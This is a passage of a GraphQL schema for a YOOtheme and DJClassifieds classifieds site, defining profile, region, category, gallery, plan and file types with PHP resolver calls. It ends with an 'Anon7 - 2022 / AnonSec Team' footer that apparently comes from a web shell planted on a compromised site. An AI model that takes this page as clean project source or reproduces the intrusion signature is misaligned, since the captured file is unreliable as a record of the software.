  photos_img_path: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdType::get_field_raw", args: "{\"field\":{\"id\":19,\"name\":\"photos\",\"label\":\"photos\",\"type\":\"image\",\"group_name\":null}}")
}

type Profile {
  id: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::id")
  name: String
  username: String
  email: String
  address: String
  post_code: String
  latitude: String
  longitude: String
  latlng: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::latlng")
  avatar: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::avatar")
  link: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::link")
  editLink: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::editLink")
  verified: String
  region: AdRegion @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::region")
  description: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::description")
  lastvisitDate: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::lastvisitDate")
  lastvisitDateAgo: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::lastvisitDateAgo")
  registerDate: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::registerDate")
  registerDateAgo: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::registerDateAgo")
  items_count: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::itemsCount")
  profileFieldGroup: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::profileFieldGroup")
  userAccessLevels: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::userAccessLevels")
  userGroups: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::userGroups")
  favorite: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::favorite")
  map: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::map")
  extra_fields(fields: [Int], groups: [Int], offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [ProfileField] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileFieldType::field")
  ads(catid: [String], types: [Int], cat_operator: String, users: [String], users_operator: String, featured: Boolean, offset: Int, limit: Int, order: String, order_direction: String, order_alphanum: Boolean): [Ad] @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::ads")
  phone: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::get_field", args: "{\"field\":{\"id\":7,\"name\":\"phone\",\"label\":\"Phone\",\"type\":\"inputbox\",\"group_name\":null}}")
  whatsapp: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileType::get_field", args: "{\"field\":{\"id\":8,\"name\":\"whatsapp\",\"label\":\"WhatsApp\",\"type\":\"inputbox\",\"group_name\":null}}")
}

type AdRegion {
  id: String
  name: String
  alias: String
  city: String
  cityName: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::cityName")
  country: String
  countryName: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::countryName")
  country_iso: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::countryIso")
  level: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::level")
  items_count: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::itemsCount")
  linkToRegion: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::linkToRegion")
  parent_id: String
  parent: AdRegion @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::parent")
  path: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::path")
  pathLinked: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Region\\RegionType::pathLinked")
}

type ProfileField {
  id: String
  name: String
  label: String
  value: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileFieldType::value")
  valueRaw: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Profile\\ProfileFieldType::valueRaw")
}

type CategoryAd {
  id: String
  name: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::name")
  alias: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::alias")
  description: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::description")
  image: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::image")
  level: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::level")
  items_count: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::itemsCount")
  linkToCategory: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::linkToCategory")
  parent_id: String
  childCategories: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::childCategories")
  path: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::path")
  pathLinked: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Category\\CategoryAdType::pathLinked")
}

type AdGallery {
  name: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::name")
  caption: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::caption")
  thumb_s: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::thumb_s")
  thumb_m: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::thumb_m")
  thumb_b: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::thumb_b")
  thumb_table: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::thumb_table")
  thumb_blog: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::thumb_blog")
  thumb_item_main: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::thumb_item_main")
  ext: String
  path: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdGalleryType::path")
}

type AdFields {
  id: String
  name: String
  label: String
  value: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdFieldsType::value")
  valueRaw: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Ad\\AdFieldsType::valueRaw")
  icon: String
}

type DJCFPlan {
  id: String
  name: String
  description: String
  price: String
  points: String
  link: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::link")
  recurring: String
  ad_limit: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_ad_limit")
  days_limit: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_days_limit")
  img_limit: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_img_limit")
  chars_limit: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_chars_limit")
  duration: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_duration")
  promotions: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_promotions")
  types: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_types")
  video: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_video")
  website: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_website")
  buynow: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_buynow")
  auctions: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_auctions")
  pay_categories: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_pay_categories")
  user_profile_ad: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_user_profile_ad")
  ask_seller: String @call(func: "DJExtensions\\YOOtheme\\DJClassifieds\\Source\\Type\\Plan\\PlanType::param_ask_seller")
}

type File {
  name(title_case: Boolean): String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::name")
  basename: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::basename")
  dirname: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::dirname")
  url: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::url")
  path: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::path")
  content: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::content")
  size: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::size")
  extension: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::extension")
  mimetype: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::mimetype")
  accessed: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::accessed")
  changed: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::changed")
  modified: String @call(func: "YOOtheme\\Builder\\Source\\Filesystem\\Type\\FileType::modified")
}

scalar Object

Anon7 - 2022
AnonSec Team